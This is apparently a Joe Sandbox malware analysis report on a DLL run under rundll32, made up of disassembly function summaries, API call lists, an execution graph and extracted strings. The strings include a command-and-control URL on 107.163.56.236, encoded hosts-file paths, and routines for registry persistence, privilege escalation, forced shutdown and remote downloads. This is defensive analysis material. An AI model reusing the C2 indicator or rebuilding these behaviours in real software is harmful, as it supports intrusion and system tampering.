                                                                                                                                      • Source File: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleep
                                                                                                                                      • String ID: 107.163.56.236:18963/main.php$L2ltYWdlLnBocA==$P
                                                                                                                                      • API String ID: 3472027048-601847069
                                                                                                                                      • Opcode ID: 4bd395b5c39b339fde20a7b994d70c682e280e2b79e8e391a426fbe1b63a5ed1
                                                                                                                                      • Instruction ID: 77f260ac7bb8c9f3f474dde5afccc9ac44bc59399944368113247b9a9829aeda
                                                                                                                                      • Opcode Fuzzy Hash: 4bd395b5c39b339fde20a7b994d70c682e280e2b79e8e391a426fbe1b63a5ed1
                                                                                                                                      • Instruction Fuzzy Hash: 8231A3779042596EEB12CBB4DC41BDA7BBCFF14350F1404E6E248E6182EB709B888B20
                                                                                                                                      Function 10004192 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 100libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • LdrInitializeThunk.NTDLL(?,log.txt), ref: 100041B2
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID: %s%s$log.txt
                                                                                                                                      • API String ID: 2994545307-1489102009
                                                                                                                                      • Opcode ID: 7d1c1fc59e0827c0da4d3170332d1142b0c483cd5d31f57e84fca59f02178f46
                                                                                                                                      • Instruction ID: 0af402a89f3107be0608909a3824c41c43b2ef279e1aa3985814f3388e4b3e0f
                                                                                                                                      • Opcode Fuzzy Hash: 7d1c1fc59e0827c0da4d3170332d1142b0c483cd5d31f57e84fca59f02178f46
                                                                                                                                      • Instruction Fuzzy Hash: 6D2183B794021C7EEB11D6A4DC85EDF776DDF04390F5044A2FB0DEA081DA74BE858A64
                                                                                                                                      Function 10005C4C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63timeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(?,10005C92,?,?,%s\lang.ini,100167C0), ref: 10003F76
                                                                                                                                      • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005CB6
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
                                                                                                                                      • String ID: %s\lang.ini$http://
                                                                                                                                      • API String ID: 1721638100-679094439
                                                                                                                                      • Opcode ID: 69a7a60b5ab7e44370f6798fbdd4a5d305837c05220455133b7ee2941a8c65fa
                                                                                                                                      • Instruction ID: 275623b6bb4d38d455d16e038d1f67d5d5eba5b08857937f3fa6caa2442e2442
                                                                                                                                      • Opcode Fuzzy Hash: 69a7a60b5ab7e44370f6798fbdd4a5d305837c05220455133b7ee2941a8c65fa
                                                                                                                                      • Instruction Fuzzy Hash: 131104769041197EFB21DAA4CC42FDB776CDB14384F0085B1FA48B6080EA71AF884660

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:5.8%
                                                                                                                                      Dynamic/Decrypted Code Coverage:99.8%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:558
                                                                                                                                      Total number of Limit Nodes:14
                                                                                                                                      execution_graph 16171 10007101 16174 10007118 16171->16174 16177 100071a6 Sleep 16174->16177 16179 100071f7 wsprintfA 16174->16179 16182 10005c4c 16174->16182 16197 10003ef4 16174->16197 16200 1000ccec 16174->16200 16205 100061bd 16174->16205 16225 1000ccf2 16174->16225 16177->16174 16230 1000570f 16179->16230 16183 10003ef4 wvsprintfA 16182->16183 16184 10005c86 16183->16184 16241 10003f72 PathFileExistsA 16184->16241 16186 10005c92 16187 10005c99 16186->16187 16188 10005c9d 16186->16188 16187->16174 16242 10004015 CreateFileA 16188->16242 16190 10005cbb 16190->16187 16243 10004035 ReadFile 16190->16243 16192 10005cd6 16244 10003f92 CloseHandle 16192->16244 16194 10005cdc 16245 10003f7d StrStrIA 16194->16245 16196 10005ce9 16196->16187 16246 10003ee1 wvsprintfA 16197->16246 16199 10003f06 16199->16174 16201 1000ccf1 16200->16201 16202 1000cd45 16201->16202 16247 1002f4e3 16201->16247 16295 10001000 16205->16295 16207 100061dd 16300 10003f0a InternetOpenA 16207->16300 16209 100061e4 16210 100061ee 16209->16210 16301 10003f24 InternetOpenUrlA 16209->16301 16210->16174 16212 10006206 16213 10006210 16212->16213 16221 10006219 16212->16221 16303 10003f58 InternetCloseHandle 16213->16303 16215 10006276 16305 10003f58 InternetCloseHandle 16215->16305 16217 10006216 16306 10003f58 InternetCloseHandle 16217->16306 16218 1000ccec 2 API calls 16218->16221 16221->16215 16221->16218 16222 1000626c 16221->16222 16302 10003f41 InternetReadFile 16221->16302 16304 10003f92 CloseHandle 16222->16304 16224 10006274 16224->16215 16226 1002f4e3 2 API calls 16225->16226 16227 1000ccf3 16226->16227 16228 1002f4e3 2 API calls 16227->16228 16229 1000ccf8 16228->16229 16231 1000571c 16230->16231 16232 10005724 wsprintfA 16231->16232 16307 10005318 16232->16307 16234 10005776 wsprintfA wsprintfA 16309 10032655 16234->16309 16236 100057da PrintFile 16311 10004d36 16236->16311 16241->16186 16242->16190 16243->16192 16244->16194 16245->16196 16246->16199 16250 1002097a 16247->16250 16251 10020989 16250->16251 16254 100240cd 16251->16254 16253 10026fea 16253->16253 16255 1002c97a 16254->16255 16258 1001f326 16255->16258 16257 1002c9cd 16257->16253 16260 1001f2fc 16258->16260 16260->16258 16264 10029ed5 16260->16264 16261 10032fac 16269 1003090d 16261->16269 16263 10032fb6 16263->16257 16266 10029ee0 16264->16266 16273 1002e018 16264->16273 16266->16261 16267 1003090d CreateThread 16266->16267 16268 10032fb6 16267->16268 16268->16261 16270 10030919 16269->16270 16281 1002591a 16270->16281 16272 10030937 16272->16263 16276 1002bfb8 16273->16276 16275 1002e024 16275->16266 16277 1002bfbd 16276->16277 16278 1002bfcc PathIsDirectoryA 16277->16278 16280 1002bff9 16277->16280 16279 1002bfd1 16278->16279 16279->16275 16282 1002592a 16281->16282 16283 10023061 16281->16283 16282->16272 16283->16282 16286 10025042 16283->16286 16288 10022efa 16286->16288 16289 10022f06 16288->16289 16291 100344a3 16289->16291 16292 100206f0 16289->16292 16293 1002e44c CreateThread 16292->16293 16294 10020704 16293->16294 16296 1000ccf2 2 API calls 16295->16296 16297 100016c0 16296->16297 16298 1000ccec 2 API calls 16297->16298 16299 100016fe ctype 16298->16299 16299->16207 16300->16209 16301->16212 16302->16221 16303->16217 16304->16224 16305->16217 16306->16210 16308 10005325 16307->16308 16308->16234 16310 1003265e 16309->16310 16310->16236 16312 10004d40 16311->16312 16313 1000ccec 2 API calls 16312->16313 16314 10004d5e 16313->16314 16324 1002320d 16314->16324 16325 1002cebb 16324->16325 16328 1002e357 16325->16328 16331 10038267 16328->16331 16334 1002c97f 16331->16334 16333 10038276 16335 1002c990 16334->16335 16336 1001f326 2 API calls 16335->16336 16337 1002c9cd 16336->16337 16337->16333 16360 10006dc4 16361 10006dce 16360->16361 16363 10006e10 16361->16363 16375 10006ec4 16361->16375 16376 10008a59 16361->16376 16381 10005aca 16363->16381 16365 10006e56 16366 10003ef4 wvsprintfA 16365->16366 16367 10006e8f 16366->16367 16384 10006c69 16367->16384 16370 10001000 2 API calls 16371 10006eaa 16370->16371 16372 10003ef4 wvsprintfA 16371->16372 16373 10006eb8 16372->16373 16393 10006290 16373->16393 16377 1000ccec 2 API calls 16376->16377 16378 10008a6f 16377->16378 16379 10008a86 16378->16379 16404 10008cb0 16378->16404 16379->16363 16382 1000ccec 2 API calls 16381->16382 16383 10005b01 16382->16383 16383->16365 16385 1000ccf2 2 API calls 16384->16385 16386 10006c76 16385->16386 16411 10006b9c 16386->16411 16389 1000ccf2 2 API calls 16391 10006c8d 16389->16391 16390 10006ce2 16390->16370 16391->16390 16392 1000ccf2 2 API calls 16391->16392 16392->16391 16394 10001000 2 API calls 16393->16394 16395 100062a2 16394->16395 16415 10003f0a InternetOpenA 16395->16415 16397 100062a9 16403 100062da 16397->16403 16416 10003f24 InternetOpenUrlA 16397->16416 16399 100062c4 16417 10003f58 InternetCloseHandle 16399->16417 16401 100062d4 16418 10003f58 InternetCloseHandle 16401->16418 16403->16375 16405 1000ccec 2 API calls 16404->16405 16406 10008cca 16405->16406 16407 1000ccec 2 API calls 16406->16407 16409 10008cdd 16407->16409 16408 10008d43 16408->16379 16409->16408 16410 1000ccec 2 API calls 16409->16410 16410->16408 16412 10006bb7 16411->16412 16413 1000ccf2 2 API calls 16412->16413 16414 10006bc2 16412->16414 16413->16414 16414->16389 16415->16397 16416->16399 16417->16401 16418->16403 16419 10005846 16420 1000584d 16419->16420 16421 10005862 16420->16421 16423 10003eb4 gethostbyname 16420->16423 16423->16421 16424 10008007 16432 10007f95 16424->16432 16425 100081d2 16451 10007f3e 16425->16451 16427 10003ef4 wvsprintfA 16427->16432 16428 100081de 16431 10005c4c 6 API calls 16431->16432 16432->16424 16432->16425 16432->16427 16432->16428 16432->16431 16433 10001000 2 API calls 16432->16433 16435 100081b8 Sleep 16432->16435 16436 100081aa 16432->16436 16437 10004770 16432->16437 16447 10007df2 16432->16447 16454 100344c6 16432->16454 16433->16432 16435->16432 16436->16435 16439 10004785 16437->16439 16438 1000ccf2 PathIsDirectoryA CreateThread 16438->16439 16439->16438 16440 100047b7 16439->16440 16446 10004823 16439->16446 16457 1000cb7a 16440->16457 16444 100047e0 16463 10004630 16444->16463 16446->16432 16448 10007dfc 16447->16448 16565 1000cce6 16448->16565 16450 10007e21 ctype 16450->16432 16570 10033af5 16451->16570 16583 1002fc59 16454->16583 16473 1000ca63 16457->16473 16459 100047d6 16460 1000cbe6 16459->16460 16492 1000cb91 16460->16492 16464 10004662 16463->16464 16465 10004696 wsprintfA 16464->16465 16472 1000475b 16464->16472 16466 1000ccf2 2 API calls 16465->16466 16471 100046d1 ctype 16466->16471 16468 1000cbe6 3 API calls 16468->16471 16469 10004630 3 API calls 16469->16471 16471->16468 16471->16469 16471->16472 16548 10004564 16471->16548 16554 1000cbcb 16471->16554 16472->16446 16474 1000ca6d 16473->16474 16475 1000ca8f 16474->16475 16483 1000cae6 16474->16483 16479 1000bb79 16475->16479 16478 1000caa9 ctype 16478->16459 16480 1000bb8c 16479->16480 16481 1000bbbf 16479->16481 16480->16481 16487 10021083 16480->16487 16481->16478 16484 1000cb27 16483->16484 16485 1000cb1d 16483->16485 16484->16475 16485->16484 16486 1000ccf2 2 API calls 16485->16486 16486->16484 16490 1001f9aa 16487->16490 16489 1002108b Sleep 16491 1001f9b4 16490->16491 16491->16489 16493 1000cb9b 16492->16493 16494 1000cba2 16492->16494 16493->16444 16494->16493 16496 1000c39a 16494->16496 16498 1000c3b9 16496->16498 16512 1000c3af 16496->16512 16497 1000c42a 16500 1000c458 16497->16500 16513 1000b8b6 16497->16513 16498->16497 16499 1000ccf2 2 API calls 16498->16499 16498->16512 16499->16497 16502 1000c471 16500->16502 16503 1000c465 16500->16503 16506 1000c46f 16502->16506 16520 1000bf26 16502->16520 16516 1000beae 16503->16516 16507 1000ccf2 2 API calls 16506->16507 16506->16512 16509 1000c4e5 16507->16509 16508 1000c76f rand 16508->16508 16510 1000c782 16508->16510 16509->16508 16509->16512 16510->16512 16524 1000c261 16510->16524 16512->16493 16514 1000ccf2 2 API calls 16513->16514 16515 1000b8c2 16514->16515 16515->16500 16517 1000bed4 16516->16517 16518 1000bedb 16516->16518 16517->16506 16518->16517 16519 1000bf26 2 API calls 16518->16519 16519->16517 16521 1000bf56 16520->16521 16523 1000bf6c 16520->16523 16521->16523 16528 100385e4 16521->16528 16523->16506 16525 1000c26d 16524->16525 16544 1000a573 16525->16544 16527 1000c31a 16527->16512 16530 100385e9 16528->16530 16531 10028253 16528->16531 16534 10031bca 16531->16534 16535 10039eb8 16534->16535 16538 100281f9 16535->16538 16540 10023275 16538->16540 16541 10023280 16540->16541 16542 100212a2 PathIsDirectoryA CreateThread 16541->16542 16543 1002fb00 16541->16543 16542->16541 16545 1000a583 16544->16545 16546 1000ccec 2 API calls 16545->16546 16547 1000a5d3 16546->16547 16547->16527 16547->16547 16549 10004571 16548->16549 16553 100045ae 16549->16553 16557 1001f2d2 16549->16557 16551 1000ccec 2 API calls 16552 100045bb 16551->16552 16552->16551 16552->16553 16553->16471 16555 1000cb91 3 API calls 16554->16555 16556 1000cbe2 16555->16556 16556->16471 16558 10034ca3 16557->16558 16560 1001f2e1 16557->16560 16558->16558 16559 1001f49d 16559->16552 16560->16559 16561 10029ed5 2 API calls 16560->16561 16562 10032fac 16561->16562 16563 1003090d CreateThread 16562->16563 16564 10032fb6 16563->16564 16564->16552 16566 1000ccec 16565->16566 16567 1000cd45 16566->16567 16568 1002f4e3 2 API calls 16566->16568 16569 1000ccf8 16568->16569 16573 1002e58a 16570->16573 16576 10023095 16573->16576 16579 10026b0a 16576->16579 16578 100230a2 16579->16578 16580 1003449a 16579->16580 16581 100206f0 CreateThread 16580->16581 16582 100344a3 16580->16582 16581->16582 16582->16578 16584 1002fc7a 16583->16584 16587 10021c7e 16584->16587 16586 1002fc80 16588 10021c94 16587->16588 16589 100206f0 CreateThread 16588->16589 16590 100344a3 16588->16590 16589->16590 16590->16586 16760 10008567 Sleep 16761 1000858a 16760->16761 16762 10001000 2 API calls 16760->16762 16763 1000ccec 2 API calls 16761->16763 16762->16761 16764 100085a5 16763->16764 16765 100061bd 7 API calls 16764->16765 16766 100085b1 16765->16766 16767 100085c3 16766->16767 16768 100085ba Sleep 16766->16768 16769 100085df wsprintfA 16767->16769 16768->16768 16770 10008602 16769->16770 16771 100087a8 16772 100087ae 16771->16772 16773 100087e0 CreateThread 16772->16773 16779 10004482 16772->16779 16774 100087e6 Sleep 16773->16774 16776 100087eb 16774->16776 16778 100087c0 Sleep CreateThread Sleep 16778->16773 16785 10006a6e 16778->16785 16780 10001000 2 API calls 16779->16780 16781 1000448d 16780->16781 16784 100040ba RegOpenKeyExA 16781->16784 16783 100044a4 16783->16774 16783->16778 16784->16783 16786 10006a82 16785->16786 16794 10003ece CreateMutexA 16786->16794 16788 10006aa3 GetLastError 16789 10006ab4 16788->16789 16790 10006af5 16788->16790 16791 1000ccec 2 API calls 16789->16791 16792 10006ae1 CreateThread 16789->16792 16793 10006ad8 Sleep 16789->16793 16791->16789 16792->16790 16795 1000687e 16 API calls 16792->16795 16793->16789 16794->16788 16796 1000826c 16797 100082a7 16796->16797 16798 10001000 2 API calls 16797->16798 16799 100082cf 16798->16799 16800 10001000 2 API calls 16799->16800 16808 100082e6 16800->16808 16801 10005c4c 6 API calls 16801->16808 16802 10003ef4 wvsprintfA 16802->16808 16803 1000ccec 2 API calls 16803->16808 16804 100061bd 7 API calls 16804->16808 16805 1000838e Sleep 16805->16808 16806 1000ccf2 2 API calls 16806->16808 16808->16801 16808->16802 16808->16803 16808->16804 16808->16805 16808->16806 16809 100083df wsprintfA 16808->16809 16810 10001000 2 API calls 16808->16810 16811 1000720e 16808->16811 16809->16808 16810->16808 16812 10007218 16811->16812 16814 1000726f 16812->16814 16843 1000756c 16812->16843 16845 10007a62 16812->16845 16814->16843 16852 1000504d 16814->16852 16816 100072b4 16817 1000ccf2 2 API calls 16816->16817 16844 10007404 16816->16844 16820 100072e1 16817->16820 16818 10007475 16821 1000ccf2 2 API calls 16818->16821 16822 1000748b 16818->16822 16818->16843 16819 1000ccf2 2 API calls 16819->16818 16820->16844 16856 10007ccb 16820->16856 16821->16822 16825 10007ccb MultiByteToWideChar 16822->16825 16822->16843 16824 100072fb 16827 1000504d MultiByteToWideChar 16824->16827 16824->16844 16826 100074a5 16825->16826 16829 1000504d MultiByteToWideChar 16826->16829 16826->16843 16828 1000731d SafeArrayCreate VariantInit SafeArrayCreate VariantInit 16827->16828 16833 1000504d MultiByteToWideChar 16828->16833 16830 100074ca 16829->16830 16832 1000504d MultiByteToWideChar 16830->16832 16834 100074d9 SafeArrayCreate VariantInit 16832->16834 16837 10007392 16833->16837 16836 1000504d MultiByteToWideChar 16834->16836 16839 1000752f 16836->16839 16838 1000504d MultiByteToWideChar 16837->16838 16841 100073cb 16838->16841 16840 1000504d MultiByteToWideChar 16839->16840 16840->16843 16842 1000504d MultiByteToWideChar 16841->16842 16842->16844 16843->16808 16844->16818 16844->16819 16846 10007a6c 16845->16846 16847 10007a9d VariantInit 16846->16847 16850 10007afa 16846->16850 16848 1000504d MultiByteToWideChar 16847->16848 16849 10007ab6 16848->16849 16849->16850 16860 10007c2b 16849->16860 16850->16814 16853 10005057 16852->16853 16855 10005078 16853->16855 16864 100050f5 16853->16864 16855->16816 16857 10007cd5 16856->16857 16858 10007ce9 16857->16858 16859 1000504d MultiByteToWideChar 16857->16859 16858->16824 16859->16858 16861 10007c35 16860->16861 16862 10007c4f VariantInit 16861->16862 16863 10007c45 16861->16863 16862->16863 16863->16850 16867 1000d0ae 16864->16867 16866 1000510c 16866->16855 16868 1000d0bd 16867->16868 16870 1000d0b9 16867->16870 16869 1000d0d6 MultiByteToWideChar 16868->16869 16869->16870 16870->16866 16591 1000270d 16592 10002712 16591->16592 16593 10001000 2 API calls 16592->16593 16594 1000271c 16593->16594 16595 10001000 2 API calls 16594->16595 16596 1000273f 16595->16596 16871 100044ad 16879 1003672f 16871->16879 16873 100044c9 16883 1002acb8 16873->16883 16875 100044d8 GetExtendedUdpTable 16876 100044ef 16875->16876 16877 10004504 16876->16877 16878 10004509 GetExtendedUdpTable 16876->16878 16878->16877 16880 10036735 16879->16880 16881 1002d065 16879->16881 16886 10021d6c 16880->16886 16881->16873 16898 1002a5cf 16883->16898 16888 1002662c 16886->16888 16891 10030687 16888->16891 16893 10030695 16891->16893 16894 1002bc15 16891->16894 16893->16893 16895 1002bc1a 16894->16895 16896 100206f0 CreateThread 16895->16896 16897 100344a3 16895->16897 16896->16897 16897->16893 16901 1002970a 16898->16901 16904 1003653e 16901->16904 16909 10021aa3 16904->16909 16910 10021ab6 16909->16910 16913 1002bb59 16910->16913 16914 1003766d 16913->16914 16916 10024c10 16914->16916 16919 1002ef5a 16916->16919 16920 1002ef67 16919->16920 16923 1001fd48 16920->16923 16924 10020989 16923->16924 16925 100240cd 2 API calls 16924->16925 16926 10026fea 16925->16926 16926->16926 16597 10001812 16598 10001817 16597->16598 16599 10001000 2 API calls 16598->16599 16600 10001821 16599->16600 16931 100206f0 16934 1002e44c 16931->16934 16935 10025284 16934->16935 16935->16934 16936 1002e465 16935->16936 16937 1002529f CreateThread 16935->16937 16937->16935 16601 10006ed6 16604 10006cf7 16601->16604 16617 10003ff7 GetShortPathNameA 16604->16617 16606 10006d32 16607 10001000 2 API calls 16606->16607 16608 10006d54 16607->16608 16618 1000406c RegCreateKeyExA 16608->16618 16610 10006d60 wsprintfA 16611 1000ccf2 2 API calls 16610->16611 16612 10006d9a 16611->16612 16619 100040d4 RegSetValueExA 16612->16619 16614 10006db3 16620 10004092 RegCloseKey 16614->16620 16616 10006dbe 16617->16606 16618->16610 16619->16614 16620->16616 16938 100081f7 16939 10008200 16938->16939 16941 1000825f Sleep 16939->16941 16942 10007f3e CreateThread 16939->16942 16943 1000400a GetDriveTypeA 16939->16943 16941->16939 16942->16939 16943->16939 16944 1000363a 16945 1000363f 16944->16945 16946 10001000 2 API calls 16945->16946 16947 10003649 16946->16947 16954 10028b50 16947->16954 16956 10028b55 16954->16956 16957 10023a16 16954->16957 16958 10024bd6 16957->16958 16959 10024bf6 CreateThread 16958->16959 16960 1002a94f 16959->16960 16960->16956 16629 10006ede 16630 10006eeb 16629->16630 16631 10001000 2 API calls 16630->16631 16632 10006ef8 16631->16632 16633 10001000 2 API calls 16632->16633 16635 10006f06 16633->16635 16634 1000591c lstrcmpiA CloseHandle CreateToolhelp32Snapshot Process32First Process32Next 16634->16635 16635->16634 16636 10006f1f Sleep 16635->16636 16637 10006f2c 16635->16637 16636->16635 16638 10001000 2 API calls 16637->16638 16639 10006f83 16638->16639 16640 10001000 2 API calls 16639->16640 16643 10006f9a 16640->16643 16641 10005c4c 6 API calls 16641->16643 16642 10003ef4 wvsprintfA 16642->16643 16643->16641 16643->16642 16644 1000ccec 2 API calls 16643->16644 16645 100061bd 7 API calls 16643->16645 16647 1000ccf2 2 API calls 16643->16647 16648 10007053 Sleep 16643->16648 16649 10007092 wsprintfA 16643->16649 16650 100070c8 PrintFile PrintFile 16643->16650 16651 10004139 16643->16651 16644->16643 16645->16643 16647->16643 16648->16643 16649->16643 16650->16643 16652 10004146 16651->16652 16653 1000ccf2 2 API calls 16652->16653 16654 10004286 16652->16654 16653->16654 16654->16643 16655 10006b1f 16656 10006b3d 16655->16656 16663 10003ece CreateMutexA 16656->16663 16658 10006b50 GetLastError 16659 10006b61 CreateThread 16658->16659 16661 10006b90 16658->16661 16664 1002035b 16659->16664 16666 1000687e 16659->16666 16662 10006b7b Sleep 16662->16659 16663->16658 16665 10026a07 16664->16665 16665->16662 16665->16665 16667 100068aa 16666->16667 16677 10005db4 16667->16677 16669 100068ec 16670 1000ccec 2 API calls 16671 100068c0 16670->16671 16671->16669 16671->16670 16673 10005f15 AdjustTokenPrivileges LookupPrivilegeValueA OpenProcessToken GetCurrentProcess 16671->16673 16693 1002fc7a 16671->16693 16696 10005f98 16671->16696 16707 1000600f 16671->16707 16711 10003f63 ExitWindowsEx 16671->16711 16673->16671 16678 10005de5 16677->16678 16712 1000409d RegQueryValueExA 16678->16712 16680 10005e16 16713 10004092 RegCloseKey 16680->16713 16682 10005e1e 16714 100058a4 16682->16714 16684 10005e49 16685 10005aca 2 API calls 16684->16685 16686 10005e52 16685->16686 16687 10003ef4 wvsprintfA 16686->16687 16688 10005e89 16687->16688 16722 10005cf7 16688->16722 16691 10003ef4 wvsprintfA 16692 10005ee1 16691->16692 16692->16671 16694 10021c7e CreateThread 16693->16694 16695 1002fc80 16694->16695 16695->16671 16697 10003ef4 wvsprintfA 16696->16697 16698 10005fb9 16697->16698 16745 10004015 CreateFileA 16698->16745 16700 10005fd9 16701 10005fe3 16700->16701 16702 1000ccf2 2 API calls 16700->16702 16701->16671 16703 10005ff4 16702->16703 16746 10003f9d WriteFile 16703->16746 16705 10005fff 16747 10003f92 CloseHandle 16705->16747 16708 10006020 16707->16708 16709 1000ccec 2 API calls 16708->16709 16710 100060ec 16709->16710 16710->16671 16711->16671 16712->16680 16713->16682 16715 100058b4 16714->16715 16721 10005901 16714->16721 16716 1000ccf2 2 API calls 16715->16716 16717 100058ba 16716->16717 16718 1000ccec 2 API calls 16717->16718 16717->16721 16719 100058d8 16718->16719 16719->16719 16720 1000ccec 2 API calls 16719->16720 16719->16721 16720->16721 16721->16684 16723 10003ef4 wvsprintfA 16722->16723 16724 10005d31 16723->16724 16739 10003f72 PathFileExistsA 16724->16739 16726 10005d3d 16727 10005d44 16726->16727 16728 10005d48 16726->16728 16727->16691 16727->16692 16740 10004015 CreateFileA 16728->16740 16730 10005d66 16730->16727 16741 10004035 ReadFile 16730->16741 16732 10005d81 16742 10003f92 CloseHandle 16732->16742 16734 10005d87 16743 10003f7d StrStrIA 16734->16743 16736 10005d94 16736->16727 16744 10003f7d StrStrIA 16736->16744 16738 10005da8 16738->16727 16739->16726 16740->16730 16741->16732 16742->16734 16743->16736 16744->16738 16745->16700 16746->16705 16747->16701

                                                                                                                                      Executed Functions

                                                                                                                                      Function 10006EDE Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 174sleepfileCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNEL32(0000EA60), ref: 10006F24
                                                                                                                                      • Sleep.KERNEL32 ref: 10007059
                                                                                                                                      • wsprintfA.USER32 ref: 1000709D
                                                                                                                                      • PrintFile.4HSURTWNWJ(00000000,?,00000000), ref: 100070D6
                                                                                                                                      • PrintFile.4HSURTWNWJ(00000000,?,00000000,?,00000000), ref: 100070E9
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FilePrintSleep$wsprintf
                                                                                                                                      • String ID: QVNEU3ZjLmV4ZQ==$QVlSVFNydi5heWU=$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$c:\1.txt$http://107.163.56.236:18963/main.php$iOffset
                                                                                                                                      • API String ID: 1547040302-225904188
                                                                                                                                      • Opcode ID: 13c44e4ca964a45a88a79011be1c9ae0f8fb5727c7f8a16b18f1d18f5d83ec3c
                                                                                                                                      • Instruction ID: 7c4733b2b25a4913de381e4f7388076186c29a0bebbbdc1df1b0301bf662e4ca
                                                                                                                                      • Opcode Fuzzy Hash: 13c44e4ca964a45a88a79011be1c9ae0f8fb5727c7f8a16b18f1d18f5d83ec3c
                                                                                                                                      • Instruction Fuzzy Hash: 6151D9B6D04359A6F722D764CC56FCF77ACEB083C1F1045A5F208E6086DB79AB808E55
                                                                                                                                      Function 10006CF7 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 72timeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 10003FF7: GetShortPathNameA.KERNEL32(?,?,?), ref: 10004003
                                                                                                                                        • Part of subcall function 1000406C: RegCreateKeyExA.KERNEL32(?,00000000,000F003F,00000000,?,00000000,00000000,80000001,10006D60,?,10006D60,80000001,00000000,00000000,REG_SZ,00000000), ref: 1000408A
                                                                                                                                      • wsprintfA.USER32 ref: 10006D88
                                                                                                                                      • ___crtGetTimeFormatEx.LIBCMT ref: 10006DAE
